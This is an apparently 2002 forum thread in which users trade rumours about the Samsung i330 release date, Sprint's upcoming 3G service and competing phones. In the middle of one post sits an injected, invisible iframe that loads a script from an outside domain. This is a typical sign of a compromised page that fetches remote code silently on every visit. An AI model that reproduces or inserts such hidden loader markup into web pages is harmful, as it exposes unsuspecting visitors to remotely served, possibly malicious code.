According to "Sprint Rep" at the largest Best Buy in the world (Richfield, Minnesota) just down the road from the Corporate Headquarters.....The release date for the Samsung I-330 is Thursday July 18, 2002. . Is this more TechVapor???
BTW Best Buy says there are no I-300's in the five state area
hmm.. sales must be good for the i330! congrats samsung...
now about that date.... seems a little premature to me...
i dont care if mr. greenspan himself said that date.. i think its too early.... <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
i330 looks good, but i can't find a price anywhere.. i might just hold out for the NEXiO... 3G's gonna roll out and the i330 is still CDMA1900....? why?
I work with the Sprint business guys. Just got this note today from one of them
"We are involved in pretty intense 3G training now. Sprint has named their 3G, PCS Vision. ... we are performing some tests with high speed data (avg speed 256kbps) coming this Sept ...We are rolling out the normal 3G product on Aug 8th. I played with a wireless aircard and was averaging 65kbps, pretty good compared to a dial-up. No pricing as yet (they are keeping that pretty close to the vest) and no handsets until Aug 8th and they will roll in slowly up till Nov."
Another update from the same Sprint business rep referenced above on the release date of the I330.
"We aren’t sure when they will be released but last estimate was Oct or Nov."
If accurate, that would suck! I have been wondering about the rumors of impending release. Normally the product vendor (Samsung) would put product info on their website several weeks before it was widely commercially available to drive demand. Since we're not seeing anything on their site, it leads me to believe the release is not imminent.
Are there any new updates to the release of the I330? I have stopped by numerous Sprint stores and nobody knows what I'm talking about when I mention I330. The last word I had heard on this forum was August availability.
Sprint has a good point. The I330 is basically a sexier I300, whose features really don't stand up to other phones expected shortly in the U.S., like the Sony/Ericsson P800 or even the new Kyocera or other Samsung models.
Samsung needs a faster time-to-market with their products.

Wait a sec, the i330 WILL be 3G ready. That's why everyone will buy it. If the i700 is anywhere near the price of the toshiba 2032 (799.99) then I'll be sure to stay away.
